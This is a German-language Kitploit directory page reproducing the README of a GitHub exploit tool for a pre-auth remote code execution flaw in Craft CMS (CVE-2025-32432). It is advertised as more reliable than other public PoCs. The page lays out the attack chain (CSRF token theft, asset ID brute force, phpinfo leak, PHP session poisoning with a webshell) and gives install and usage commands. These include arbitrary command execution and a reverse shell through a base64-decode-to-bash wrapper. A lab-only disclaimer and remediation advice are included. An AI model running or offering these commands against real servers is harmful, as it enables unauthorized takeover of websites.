Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32432-exploit-by-P34NUT — Zuverlässiger CVE-2025-32432 Pre-Auth-RCE-Exploit für Craft CMS 3.x/4.x/5.x, funktioniert dort, wo andere öffentliche PoCs versagen | Kitploit
Tools/GitHubGitHub/p34nut2/cve-2025-32432-exploit-by-p34nut
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubp34nut2/cve-2025-32432-exploit-by-p34nut

CVE-2025-32432-exploit-by-P34NUT

Zuverlässiger CVE-2025-32432 Pre-Auth-RCE-Exploit für Craft CMS 3.x/4.x/5.x, funktioniert dort, wo andere öffentliche PoCs versagen

Repository anzeigen
2vor 14h 54mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32432 — Craft CMS Pre-Auth RCE Exploit

Autor: P34NUT2
Schwachstelle: Remote Code Execution (Pre-Authenticated) in Craft CMS
CVE: CVE-2025-32432
Ziel: Jede verwundbare Craft CMS-Instanz (3.x / 4.x / 5.x) — getestet auf Hack The Box: Orion


⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests in kontrollierten Umgebungen wie Hack The Box, TryHackMe oder privaten Labors bereitgestellt, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Die unbefugte Nutzung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal gemäß dem Computer Fraud and Abuse Act (CFAA), der EU-Richtlinie über Angriffe auf Informationssysteme und vergleichbaren Gesetzen in den meisten Rechtsordnungen weltweit.

Der Autor übernimmt keine Verantwortung oder Haftung für jeglichen Missbrauch, Schaden oder rechtliche Konsequenzen, die sich aus der Nutzung dieser Software ergeben. Nutzen Sie sie verantwortungsvoll und ethisch.


💡 Motivation & Hintergrund

Die meisten öffentlichen PoCs für CVE-2025-32432 scheitern an realen Zielen wie HTB: Orion aufgrund von:

  • Unsachgemäßer URL-Parameter-Kodierung
  • Fehlerhafter Behandlung von Sonderzeichen (&, , )
>
<
  • Abschneiden der Session-Datei während der PHP-Session-Poisoning-Phase
  • Dieser Exploit wurde von Grund auf neu entwickelt, um diese Zuverlässigkeitsprobleme zu lösen. Er behandelt URL-Kodierung ordnungsgemäß, automatisiert die dynamische Token-Extraktion und verwendet Base64-Wrapper-Pipelines, um eine zuverlässige Ausführung gegen jede verwundbare Craft CMS-Instanz zu erreichen — validiert gegen reale Deployments und bewiesen auf HTB Orion.


    🔗 Technische Exploit-Kette

    SchrittAktionBeschreibung
    1Session- & CSRF-BeschaffungExtrahiert CraftSessionId, CRAFT_CSRF_TOKEN und dynamisches CSRF_TOKEN vom Admin-Endpunkt
    2Asset-ID-ErkennungBrute-Forcing gültiger Asset-IDs, die für die Transform-Generierungs-Payload erforderlich sind
    3Session-Pfad-LeakInjiziert ein Guzzle-Objekt, um phpinfo() auszulösen und session.save_path dynamisch auszulesen
    4Session-PoisoningInjiziert eine URL-kodierte PHP-Webshell-Payload in die aktive Session-Datei
    5RCE-TriggerDeserialisiert die vergiftete Session, um beliebige Systembefehle auszuführen

    📦 Installation

    root@kitploit:~
    git clone https://github.com/P34NUT2/CVE-2025-32432-exploit-by-P34NUT2.git
    cd CVE-2025-32432-exploit-by-P34NUT2
    pip install -r requirements.txt
    

    🚀 Verwendung

    Argumente

    FlagLange OptionErforderlichBeschreibung
    -u--url✅ JaZiel-Basis-URL (z. B. http://example.com)
    -c--cmd✅ JaBefehl, der auf dem entfernten Ziel ausgeführt werden soll
    -a--asset❌ NeinBekannte gültige Asset-ID (beschleunigt die Ausführung)
    -s--scan-max❌ NeinMaximaler Asset-ID-Brute-Force-Bereich (Standard: 300)

    Beispiele

    1. Grundlegende Befehlsausführung

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://example.com -c "whoami"
    

    2. Mit bekannter Asset-ID (schneller)

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://example.com -a 1 -c "id"
    

    3. Kodierte Payload (empfohlen für Sonderzeichen)

    Um zu verhindern, dass Sonderzeichen durch HTTP-Parser verändert oder während der Session-Verarbeitung abgeschnitten werden, kodieren Sie Ihren Befehl vor der Übergabe in Base64:

    root@kitploit:~
    # Step 1 — encode your command locally
    echo -n "YOUR_COMMAND_HERE" | base64
    
    # Step 2 — pass the encoded string through the script
    python3 craftcms_rce_exploit_php.py -u http://example.com -c "echo <BASE64_STRING> | base64 -d | sh"
    

    4. Reverse Shell über Base64-Wrapper

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://target.htb -c "echo <B64_PAYLOAD> | base64 -d | bash"
    

    🛡️ Behebung

    Wenn Sie ein Systemadministrator oder Entwickler sind, der Craft CMS betreibt, wenden Sie die folgenden Gegenmaßnahmen an:

    • Aktualisieren Sie Craft CMS auf die neueste gepatchte Version (≥ 5.6.17 / ≥ 4.14.14).
    • Beschränken Sie den Zugriff auf administrative Aktionsendpunkte (/actions/*) durch Firewall-Regeln oder Middleware.
    • Härten Sie PHP-Session-Verzeichnisse — stellen Sie sicher, dass sie nicht von nicht vertrauenswürdigen Web-Prozessen beschreibbar sind.
    • Überwachen Sie auf anomale Deserialisierungsaktivitäten in Anwendungs- und Webserver-Logs.

    📄 Lizenz

    Dieses Projekt ist nur für Bildungs- und autorisierte Testzwecke lizenziert. Siehe LICENSE für Details.

    Tool herunterladen